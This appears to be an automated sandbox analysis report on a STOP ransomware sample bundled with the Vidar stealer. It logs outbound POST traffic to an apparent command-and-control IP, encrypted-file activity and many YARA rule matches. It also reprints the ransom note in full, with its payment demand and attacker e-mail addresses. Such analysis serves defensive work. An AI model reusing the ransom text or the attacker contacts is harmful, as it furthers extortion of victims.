Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: 2OmglUwx83.exe, 00000008.00000003.448500733.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 2OmglUwx83.exe, 00000008.00000003.451162735.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: 2OmglUwx83.exe, 00000008.00000003.459725373.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----8838260965650276Host: 49.12.9.140:1080Content-Length: 118025Connection: Keep-AliveCache-Control: no-cache
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49769 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49775 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.7:49785 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Source: C:\_readme.txt Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.You can get and look video overview decrypt tool:https://we.tl/t-QsoSRIeAK6Price of private key and decrypt software is $980.Discount 50% available if you contact us first 72 hours, that's price for you is $490.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@bestyourmail.chReserve e-mail address to contact us:datarestorehelp@airmail.ccYour personal ID:0531JhyjdMzCJ0Qyak6RQYKiwWrih4g2RGLy00AdNJY7bznA8 Jump to dropped file
Source: Yara match File source: 15.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.2OmglUwx83.exe.22115a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.2OmglUwx83.exe.22a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2OmglUwx83.exe.22915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.2OmglUwx83.exe.21f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.2OmglUwx83.exe.22a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.2OmglUwx83.exe.23415a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.2OmglUwx83.exe.21f15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.2OmglUwx83.exe.22915a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.2OmglUwx83.exe.23415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.2OmglUwx83.exe.22115a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.2OmglUwx83.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.2OmglUwx83.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.355123959.0000000002290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.427528493.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.391097079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.378489771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.393257427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.398626476.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.352491772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.424010722.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.426354404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.382228538.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.399360568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.380140535.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.405620904.0000000002340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.424342597.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.401628959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.400942313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.353670554.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.425807997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.351845503.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.379133244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 3456, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 5360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 5272, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 3044, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 5076, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 1504, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 5944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 3788, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 4444, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2OmglUwx83.exe PID: 4484, type: MEMORYSTR
Source: C:\Users\user\Desktop\2OmglUwx83.exe File moved: C:\Users\user\Desktop\WUTJSCBCFX.docx
Source: C:\Users\user\Desktop\2OmglUwx83.exe File deleted: C:\Users\user\Desktop\WUTJSCBCFX.docx
Source: C:\Users\user\Desktop\2OmglUwx83.exe File moved: C:\Users\user\Desktop\WUTJSCBCFX\CURQNKVOIX.jpg
Source: C:\Users\user\Desktop\2OmglUwx83.exe File deleted: C:\Users\user\Desktop\WUTJSCBCFX\CURQNKVOIX.jpg
Source: C:\Users\user\Desktop\2OmglUwx83.exe File moved: C:\Users\user\Desktop\DVWHKMNFNN\NWTVCDUMOB.pdf
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db entropy: 7.99822741142
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000015.db entropy: 7.9981206035
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db entropy: 7.99849325713
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000008.db entropy: 7.9986251538
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl entropy: 7.99045484651
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Temp\chrome_installer.log entropy: 7.99117223062
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT entropy: 7.99607869865
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\MSIMGSIZ.DAT entropy: 7.9957910057
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.99831481272
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\SmartScreenCache.dat entropy: 7.99858160676
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst entropy: 7.99786053621
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin entropy: 7.99398722736
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlock\urlblock_637194112741176080.bin entropy: 7.99469691887
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Temp\chrome_installer.log.vvyu (copy) entropy: 7.99117223062
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Microsoft\Internet Explorer\MSIMGSIZ.DAT.vvyu (copy) entropy: 7.99607869865
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Temporary Internet Files\Low\MSIMGSIZ.DAT.vvyu (copy) entropy: 7.9957910057
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Temporary Internet Files\Low\SmartScreenCache.dat.vvyu (copy) entropy: 7.99858160676
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt19.lst.vvyu (copy) entropy: 7.99786053621
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache.bin.vvyu (copy) entropy: 7.99398722736
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Microsoft\Internet Explorer\UrlBlock\urlblock_637194112741176080.bin.vvyu (copy) entropy: 7.99469691887
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db.vvyu (copy) entropy: 7.99822741142
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000015.db.vvyu (copy) entropy: 7.9981206035
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db.vvyu (copy) entropy: 7.99849325713
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000008.db.vvyu (copy) entropy: 7.9986251538
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.vvyu (copy) entropy: 7.99045484651
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.vvyu (copy) entropy: 7.99831481272

System Summary

Source: 1.0.2OmglUwx83.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.build2.exe.5f15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 13.0.build2.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 13.0.build2.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.2OmglUwx83.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.2OmglUwx83.exe.22115a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.2OmglUwx83.exe.22115a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 7.2.2OmglUwx83.exe.22a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.2OmglUwx83.exe.22a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.2OmglUwx83.exe.22915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.2OmglUwx83.exe.22915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.2OmglUwx83.exe.21f15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.2OmglUwx83.exe.21f15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.build2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.0.2OmglUwx83.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.0.build2.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 11.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.0.2OmglUwx83.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.2.2OmglUwx83.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.0.2OmglUwx83.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
